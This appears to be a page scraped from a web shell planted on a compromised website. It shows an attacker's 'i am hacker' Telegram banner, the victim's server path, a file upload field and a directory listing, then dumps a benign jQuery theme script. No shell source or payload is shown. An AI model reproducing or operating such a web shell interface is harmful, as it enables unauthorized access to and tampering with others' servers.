telegram : @iamdarkcomedy i am hacker

path :/home2/rdpgqqmy/public_html/techperformanceusa/public

upload file:

List of files:

name file size edit permission action
.htaccess906 KBJanuary 18 2024 20:05:520444
css-February 22 2025 03:07:500755
dashboard-February 21 2025 20:05:510755
error_log51354 KBFebruary 27 2025 15:17:580644
favicon.ico0 KBOctober 18 2021 11:56:120644
frontend-February 21 2025 20:05:510755
index.php6518 KBFebruary 21 2025 20:04:340444
index0.php1790 KBOctober 18 2021 11:56:120644
js-February 22 2025 03:23:490755
lass.php16962 KBFebruary 21 2025 20:04:340644
mix-manifest.json72 KBOctober 18 2021 17:53:080644
storage-February 22 2025 03:23:280755
uploads-February 22 2025 03:24:050755
web.config1211 KBOctober 18 2021 11:56:120644
(function($){ "use strict"; // Header Sticky $(window).on('scroll',function() { if ($(this).scrollTop() > 120){ $('.navbar-area').addClass("is-sticky"); } else{ $('.navbar-area').removeClass("is-sticky"); } }); // Others Option Responsive JS $(".others-option-for-responsive .dot-menu").on("click", function(){ $(".others-option-for-responsive .container .container").toggleClass("active"); }); // Button Hover JS $(function() { $('.default-btn') .on('mouseenter', function(e) { var parentOffset = $(this).offset(), relX = e.pageX - parentOffset.left, relY = e.pageY - parentOffset.top; $(this).find('span').css({top:relY, left:relX}) }) .on('mouseout', function(e) { var parentOffset = $(this).offset(), relX = e.pageX - parentOffset.left, relY = e.pageY - parentOffset.top; $(this).find('span').css({top:relY, left:relX}) }); }); // Popup Video $('.popup-youtube').magnificPopup({ disableOn: 320, type: 'iframe', mainClass: 'mfp-fade', removalDelay: 160, preloader: false, fixedContentPos: false }); // Mean Menu $('.mean-menu').meanmenu({ meanScreenWidth: "1199" }); // Home Slides $('.home-slides').owlCarousel({ loop: true, nav: true, dots: false, autoplayHoverPause: true, autoplay: true, items: 1, navText: [ "", "" ] }); // TweenMax JS $('.main-banner').mousemove(function(e){ var wx = $(window).width(); var wy = $(window).height(); var x = e.pageX - this.offsetLeft; var y = e.pageY - this.offsetTop; var newx = x - wx/2; var newy = y - wy/2; $('.main-banner-animation-image img:nth-child(1), .main-banner-animation-image img:nth-child(3), .main-banner-animation-image img:nth-child(5), .main-banner-animation-image img:nth-child(7), .main-banner-animation-image img:nth-child(9), .main-banner-animation-image img:nth-child(11), .main-banner-image').each(function(){ var speed = $(this).attr('data-speed'); if($(this).attr('data-revert')) speed *= -.4; TweenMax.to($(this), 1, {x: (1 - newx*speed), y: (1 - newy*speed)}); }); }); $('.main-banner').mousemove(function(e){ var wy = $(window).width(); var wx = $(window).height(); var y = e.pageY - this.offsetLeft; var x = e.pageX - this.offsetTop; var newy = y - wy/2; var newx = x - wx/2; $('.main-banner-animation-image img:nth-child(2), .main-banner-animation-image img:nth-child(4), .main-banner-animation-image img:nth-child(6), .main-banner-animation-image img:nth-child(8), .main-banner-animation-image img:nth-child(10), .main-banner-animation-image img:nth-child(12)').each(function(){ var speed = $(this).attr('data-speed'); if($(this).attr('data-revert')) speed *= -.4; TweenMax.to($(this), 1, {y: (1 - newx*speed), x: (1 - newy*speed)}); }); }); $('.banner-section').mousemove(function(e){ var wx = $(window).width(); var wy = $(window).height(); var x = e.pageX - this.offsetLeft; var y = e.pageY - this.offsetTop; var newx = x - wx/2; var newy = y - wy/2; $('.banner-animation-image img:nth-child(1), .banner-animation-image img:nth-child(3), .banner-animation-image img:nth-child(5), .banner-animation-image img:nth-child(7), .banner-animation-image img:nth-child(9), .banner-animation-image img:nth-child(11), .banner-image').each(function(){ var speed = $(this).attr('data-speed'); if($(this).attr('data-revert')) speed *= -.4; TweenMax.to($(this), 1, {x: (1 - newx*speed), y: (1 - newy*speed)}); }); }); $('.banner-section').mousemove(function(e){ var wy = $(window).width(); var wx = $(window).height(); var y = e.pageY - this.offsetLeft; var x = e.pageX - this.offsetTop; var newy = y - wy/2; var newx = x - wx/2; $('.banner-animation-image img:nth-child(2), .banner-animation-image img:nth-child(4), .banner-animation-image img:nth-child(6), .banner-animation-image img:nth-child(8), .banner-animation-image img:nth-child(10), .banner-animation-image img:nth-child(12)').each(function(){ var speed = $(this).attr('data-speed'); if($(this).attr('data-revert')) speed *= -.4; TweenMax.to($(this), 1, {y: (1 - newx*speed), x: (1 - newy*speed)}); }); }); $('.main-banner-area').mousemove(function(e){ var wx = $(window).width(); var wy = $(window).height(); var x = e.pageX - this.offsetLeft; var y = e.pageY - this.offsetTop; var newx = x - wx/2; var newy = y - wy/2; $('img').each(function(){ var speed = $(this).attr('data-speed'); if($(this).attr('data-revert')) speed *= -.8; TweenMax.to($(this), 1, {x: (1 - newx*speed), y: (1 - newy*speed)}); }); }); $('.blog-area').mousemove(function(e){ var wx = $(window).width(); var wy = $(window).height(); var x = e.pageX - this.offsetLeft; var y = e.pageY - this.offsetTop; var newx = x - wx/2; var newy = y - wy/2; $('.vector-shape1, .vector-shape2').each(function(){ var speed = $(this).attr('data-speed'); if($(this).attr('data-revert')) speed *= -1; TweenMax.to($(this), 1, {x: (1 - newx*speed), y: (1 - newy*speed)}); }); }); $('.project-start-area').mousemove(function(e){ var wx = $(window).width(); var wy = $(window).height(); var x = e.pageX - this.offsetLeft; var y = e.pageY - this.offsetTop; var newx = x - wx/2; var newy = y - wy/2; $('.project-start-image img').each(function(){ var speed = $(this).attr('data-speed'); if($(this).attr('data-revert')) speed *= -1; TweenMax.to($(this), 1, {x: (1 - newx*speed), y: (1 - newy*speed)}); }); }); $('.subscribe-area').mousemove(function(e){ var wx = $(window).width(); var wy = $(window).height(); var x = e.pageX - this.offsetLeft; var y = e.pageY - this.offsetTop; var newx = x - wx/2; var newy = y - wy/2; $('.subscribe-image img').each(function(){ var speed = $(this).attr('data-speed'); if($(this).attr('data-revert')) speed *= -1; TweenMax.to($(this), 1, {x: (1 - newx*speed), y: (1 - newy*speed)}); }); }); var controller = new ScrollMagic.Controller(); $(".section-title h2").each(function() { var tl = new TimelineMax(); if(tl.isActive()){ return false; } var cov = $(this).find(".overlay"); tl.from(cov, .5, { scaleX: 0, transformOrigin: "left" }); tl.to(cov, .5, { scaleX: 0, transformOrigin: "right" }, "reveal"); var scene = new ScrollMagic.Scene({ triggerElement: this, triggerHook: 0.7 }) .setTween(tl) .addTo(controller); }); // Case Study Slides $('.case-study-slides').owlCarousel({ loop: true, nav: true, dots: false, autoplayHoverPause: true, autoplay: true, items: 1, navText: [ "", "" ] }); // Testimonials Slides $('.testimonials-slides').owlCarousel({ loop: true, nav: true, dots: false, autoplayHoverPause: true, autoplay: true, margin: 30, navText: [ "", "" ], responsive: { 0: { items: 1, }, 768: { items: 2, }, 992: { items: 2, } } }); // Isotop Js var $grid = $('.projects-items, .blog-items').isotope({ itemSelector: '.grid-item', percentPosition: true, masonry: { // Use outer width of grid-sizer for columnWidth columnWidth: '.grid-item' } }); // Services Image Slides $('.services-details-image-slides').owlCarousel({ loop: true, nav: true, items: 1, dots: false, autoplayHoverPause: true, autoplay: true, animateOut: 'fadeOut', animateIn: 'fadeIn', navText: [ "", "" ] }); // Case Studies Image Slides $('.case-studies-details-image-slides').owlCarousel({ loop: true, nav: true, items: 1, dots: false, autoplayHoverPause: true, autoplay: true, animateOut: 'fadeOut', animateIn: 'fadeIn', navText: [ "", "" ] }); // Article Image Slides $('.article-image-slides').owlCarousel({ loop: true, nav: true, items: 1, dots: false, autoplayHoverPause: true, autoplay: true, animateOut: 'fadeOut', animateIn: 'fadeIn', navText: [ "", "" ] }); // WOW Animation JS if($('.wow').length){ var wow = new WOW({ mobile: false }); wow.init(); } // Nice Select JS $('select').niceSelect(); // Price Range Slider JS $(".js-range-of-price").ionRangeSlider({ type: "double", drag_interval: true, min_interval: null, max_interval: null, }); // Input Plus & Minus Number JS $('.input-counter').each(function() { var spinner = jQuery(this), input = spinner.find('input[type="text"]'), btnUp = spinner.find('.plus-btn'), btnDown = spinner.find('.minus-btn'), min = input.attr('min'), max = input.attr('max'); btnUp.on('click', function() { var oldValue = parseFloat(input.val()); if (oldValue >= max) { var newVal = oldValue; } else { var newVal = oldValue + 1; } spinner.find("input").val(newVal); spinner.find("input").trigger("change"); }); btnDown.on('click', function() { var oldValue = parseFloat(input.val()); if (oldValue <= min) { var newVal = oldValue; } else { var newVal = oldValue - 1; } spinner.find("input").val(newVal); spinner.find("input").trigger("change"); }); }); // Count Time function makeTimer() { var endTime = new Date("September 20, 2020 17:00:00 PDT"); var endTime = (Date.parse(endTime)) / 1000; var now = new Date(); var now = (Date.parse(now) / 1000); var timeLeft = endTime - now; var days = Math.floor(timeLeft / 86400); var hours = Math.floor((timeLeft - (days * 86400)) / 3600); var minutes = Math.floor((timeLeft - (days * 86400) - (hours * 3600 )) / 60); var seconds = Math.floor((timeLeft - (days * 86400) - (hours * 3600) - (minutes * 60))); if (hours < "10") { hours = "0" + hours; } if (minutes < "10") { minutes = "0" + minutes; } if (seconds < "10") { seconds = "0" + seconds; } $("#days").html(days + "Days"); $("#hours").html(hours + "Hours"); $("#minutes").html(minutes + "Minutes"); $("#seconds").html(seconds + "Seconds"); } setInterval(function() { makeTimer(); }, 0); // Sidebar Sticky $('.case-studies-sidebar-sticky').stickySidebar({ topSpacing: 85, bottomSpacing: 85 }); // Subscribe form $(".newsletter-form").validator().on("submit", function (event) { if (event.isDefaultPrevented()) { // handle the invalid form... formErrorSub(); submitMSGSub(false, "Please enter your email correctly."); } else { // everything looks good! event.preventDefault(); } }); function callbackFunction (resp) { if (resp.result === "success") { formSuccessSub(); } else { formErrorSub(); } } function formSuccessSub(){ $(".newsletter-form")[0].reset(); submitMSGSub(true, "Thank you for subscribing!"); setTimeout(function() { $("#validator-newsletter").addClass('hide'); }, 4000) } function formErrorSub(){ $(".newsletter-form").addClass("animated shake"); setTimeout(function() { $(".newsletter-form").removeClass("animated shake"); }, 1000) } function submitMSGSub(valid, msg){ if(valid){ var msgClasses = "validation-success"; } else { var msgClasses = "validation-danger"; } $("#validator-newsletter").removeClass().addClass(msgClasses).text(msg); } // AJAX MailChimp $(".newsletter-form").ajaxChimp({ url: "https://envytheme.us20.list-manage.com/subscribe/post?u=60e1ffe2e8a68ce1204cd39a5&id=42d6d188d9", // Your url MailChimp callback: callbackFunction }); // Tabs (function ($) { $('.tab ul.tabs').addClass('active').find('> li:eq(0)').addClass('current'); $('.tab ul.tabs li a').on('click', function (g) { var tab = $(this).closest('.tab'), index = $(this).closest('li').index(); tab.find('ul.tabs > li').removeClass('current'); $(this).closest('li').addClass('current'); tab.find('.tab-content').find('div.tabs-item').not('div.tabs-item:eq(' + index + ')').slideUp(); tab.find('.tab-content').find('div.tabs-item:eq(' + index + ')').slideDown(); g.preventDefault(); }); })(jQuery); // FAQ Accordion $(function() { $('.accordion').find('.accordion-title').on('click', function(){ // Adds Active Class $(this).toggleClass('active'); // Expand or Collapse This Panel $(this).next().slideToggle('fast'); // Hide The Other Panels $('.accordion-content').not($(this).next()).slideUp('fast'); // Removes Active Class From Other Titles $('.accordion-title').not($(this)).removeClass('active'); }); }); // Go to Top $(function(){ // Scroll Event $(window).on('scroll', function(){ var scrolled = $(window).scrollTop(); if (scrolled > 600) $('.go-top').addClass('active'); if (scrolled < 600) $('.go-top').removeClass('active'); }); // Click Event $('.go-top').on('click', function() { $("html, body").animate({ scrollTop: "0" }, 500); }); }); // Preloader $(window).on('load', function () { $('.preloader').fadeOut(); }); // activepage // $(function () { // $('.navbar-nav li a').each(function () { // if ($(this).prop('href') == window.location.href) { // $(this).addClass('active'); // } // }); // }); }(jQuery));